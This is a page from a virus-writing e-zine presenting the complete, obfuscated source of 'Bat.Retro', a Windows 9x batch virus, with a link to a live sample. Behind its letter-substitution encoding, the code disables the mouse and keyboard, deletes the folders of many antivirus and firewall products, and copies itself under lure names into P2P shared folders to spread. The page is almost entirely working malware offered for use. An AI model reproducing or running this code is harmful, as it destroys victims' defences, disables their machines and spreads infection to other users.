<html>
<head>
<title>rRlf #4</title>
</head>
<body text="#ffffff" link="#ff0f0f" vlink="#ff0f0f" alink="#ff0f0f" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>Redemption</i>
<br><table cellpadding="9">
<tr>
<th><a href="rRlf.41.html">Last article</a></th>
<th><a href="rRlf.01.html">Table of contents</a></th>
<th><a href="rRlf.43.html">Next article</a></th>
</tr>
</table>
</center>
<p><b><u>Strange Article - Bat.Retro by DvL</u></b>
<p><pre>
 finished on: 02.09.2003, 16:32
 size: 45.122 bytes
 runs on: win9x

 ** Capabilities **

 * it spreads via p2p
 * "set" encrypted
 * removes more than 20 known antivirus/spyware/"or anything against virii"
   products

=====[begin code]===============================================================
ctty nul
break off
echo off
set .=set
%.% *..................=e
%.% **.................=s
%.% ***................=a
%.% ****...............=o
%.% *****..............=r
%.% ******.............=b
%.% *******............=f
%.% ********...........=h
%.% *********..........=t
%.% **********.........=i
%.% ***********........=c
%.% ************.......=k
%.% *************......=u
%.% **************.....=d
%.% ***************....=l
%.% ****************...=n
%.% *****************..=y
%.% ******************.=m
%.% *******************=v
%*****..............%%*************......%%****************...%%**************.....%%***************....%%***************....%32 %******************.%%****...............%%*************......%%**.................%%*..................%,%**************.....%%**********.........%%**.................%%***................%%******.............%%***************....%%*..................%
%*****..............%%*************......%%****************...%%**************.....%%***************....%%***************....%32 %************.......%%*..................%%*****************..%%******.............%%****...............%%***................%%*****..............%%**************.....%,%**************.....%%**********.........%%**.................%%***................%%******.............%%***************....%%*..................%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~2\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.2\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.3\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\z%****...............%%****************...%%*..................%%***************....%%***................%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.4\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.5\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.6\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.7\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.8\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%****************...%%*********..........%%**********.........%%*******************%%**********.........%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%*******************%g\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***................%%*******************%p%*..................%%*****..............%%**.................%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%***********........%%****...............%%******************.%%******************.%%***................%%****************...%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*..................%%**.................%%***................%%*******............%%*..................%%****************...%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%%**********.........%%****************...%%**************.....%%*******************%%**********.........%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%-%******************.%%***................%%***********........%%*****..............%%****...............%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%-p%*****..............%%****...............%%*********..........%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%-p%*****..............%%****...............%%*********..........%95\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%-%**.................%%*..................%%***********........%%*************......%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%w%**********.........%%****************...%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******............%w%**********.........%%****************...%32\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%**********.........%%****************...%%****...............%%***********........%%*************......%%***************....%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%**********.........%%****************...%%****...............%%***********........%%*************......%%***************....%~2\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%************.......%%***................%%**.................%p%*..................%%*****..............%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%************.......%%***................%%**.................%p%*..................%%*****..............%~2\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%******************.%%***********........%%***................%%*******............%%*..................%%*..................%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%******************.%%**.................%%***................%%*******************%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%****************...%%****...............%%*****..............%%*********..........%%****...............%%****************...%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%****************...%%****...............%%*****..............%%*********..........%%****...............%%****************...%~2\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%***********........%%***********........%%**********.........%%***************....%%***************....%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%***********........%-%***********........%%**********.........%%***************....%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*********..........%%******.............%%***................%%*******************%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*********..........%%******.............%%***................%%*******************%w95\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*********..........%%****...............%%****...............%%***************....%%************.......%%**********.........%%*********..........%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*********..........%%*****..............%%*..................%%****************...%%**************.....%%******************.%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\%*******************%%**.................%95\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~2\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.2\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.3\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.4\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.5\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.6\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.7\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%******.............%%***................%~1.8\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%****************...%%*********..........%%**********.........%%*******************%%**********.........%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%*******************%g\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%%*******************%p%*..................%%*****..............%%**.................%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***********........%%****...............%%******************.%%******************.%%***................%%****************...%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%**.................%%*****************..%%******************.%%***................%%****************...%%*********..........%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***********........%%****...............%%******************.%%******************.%%****...............%%****************...%~1\%***................%%*******************%p%**.................%%********...........%%***................%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***********........%%****...............%%******************.%%******************.%%****...............%%****************...%~1\%**.................%%*****************..%%******************.%%***................%%****************...%%*********..........%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%-p%*****..............%%****...............%%*********..........%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%-p%*****..............%%****...............%%*********..........%95\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%%**********.........%%****************...%%**************.....%%*******************%%**********.........%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%-%**.................%%*..................%%***********........%%*************......%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%w%**********.........%%****************...%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%**********.........%%****************...%%****...............%%***********........%%*************......%%***************....%~2\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%**********.........%%****************...%%****...............%%***********........%%*************......%%***************....%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*******............%w%**********.........%%****************...%32\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\g%*****..............%%**********.........%%**.................%%****...............%%*******............%%*********..........%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%%**.................%p%*..................%%*****..............%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%%**.................%p%*..................%%*****..............%~2\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%******************.%%***********........%%***................%%*******............%%*..................%%*..................%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%****************...%%****...............%%*****..............%%*********..........%%****...............%%****************...%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%****************...%%****...............%%*****..............%%*********..........%%****...............%%****************...%~2\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\p%***................%%****************...%%**************.....%%***................%%**.................%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\q%*************......%%**********.........%%***********........%%************.......%%********...........%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%******.............%%***................%%*******************%\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%**********.........%%****************...%%*****************..%p%*..................%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%*****..............%%*..................%%****************...%%**************.....%%******************.%~1\ >%****************...%%*************......%%***************....%
%**************.....%%*..................%%***************....%%*********..........%%*****..............%%*..................%%*..................%/%*****************..% %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*********..........%%*****..............%%****...............%j%***................%%****************...%~1\ >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\%************.......%%***................%z%***................%%***................%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\%******************.%%*****************..%%**************.....%%****...............%w%****************...%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***................%pp%***************....%%*..................%j~1\%**********.........%%****************...%%***********........%%****...............%%******************.%%**********.........%%****************...%g\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%******.............%%*..................%%***................%%*****..............%%**.................%%********...........%~1\%**.................%%********...........%%***................%%*****..............%%*..................%%**************.....%\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*..................%%**************.....%%****...............%%****************...%%************.......%%*..................%~1\%**********.........%%****************...%%***********........%%****...............%%******************.%%**********.........%%****************...%g\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%*..................%%******************.%%*************......%%***************....%%*..................%\%**********.........%%****************...%%***********........%%****...............%%******************.%%**********.........%%****************...%g\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\g%*****..............%%****...............%%************.......%%**.................%%*********..........%%*..................%%*****..............%\%******************.%%*****************..%g%*****..............%%****...............%%************.......%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%**********.........%%***********........%q\%**.................%%********...........%%***................%%*****..............%%*..................%%**************.....%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%z%***................%%***................%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%***................%z%***................%%***................%%***************....%~1\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%************.......%%******************.%%**************.....%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%***************....%%**********.........%%******************.%%*..................%w%**********.........%%*****..............%%*..................%\%**.................%%********...........%%***................%%*****..............%%*..................%%**************.....%\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%******************.%%****...............%%*****..............%p%********...........%%*..................%%*************......%%**.................%\%******************.%%*****************..%%**.................%%********...........%%***................%%*****..............%~1\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%****...............%p%*****************..% %0 %***********........%:\p%*****..............%%****...............%g%*****..............%%***................%~1\%****...............%%*******************%%*..................%%*****..............%%****************...%%*..................%%*********..........%\%******.............%%*************......%%****************...%%**************.....%%***************....%%*..................%%**.................%\"%**.................%%****...............%%******.............%%**********.........%g.%*******............%.%***********........%%***************....%%*..................%%***................%%****************...%%*..................%%*****..............%.%*..................%x%*..................%                         .%******.............%%***................%%*********..........%" >%****************...%%*************......%%***************....%
%***********........%%***************....%%**.................%
</pre>
<p><a href="rRlf.42.zip">living virus</a>
</body>
</html>
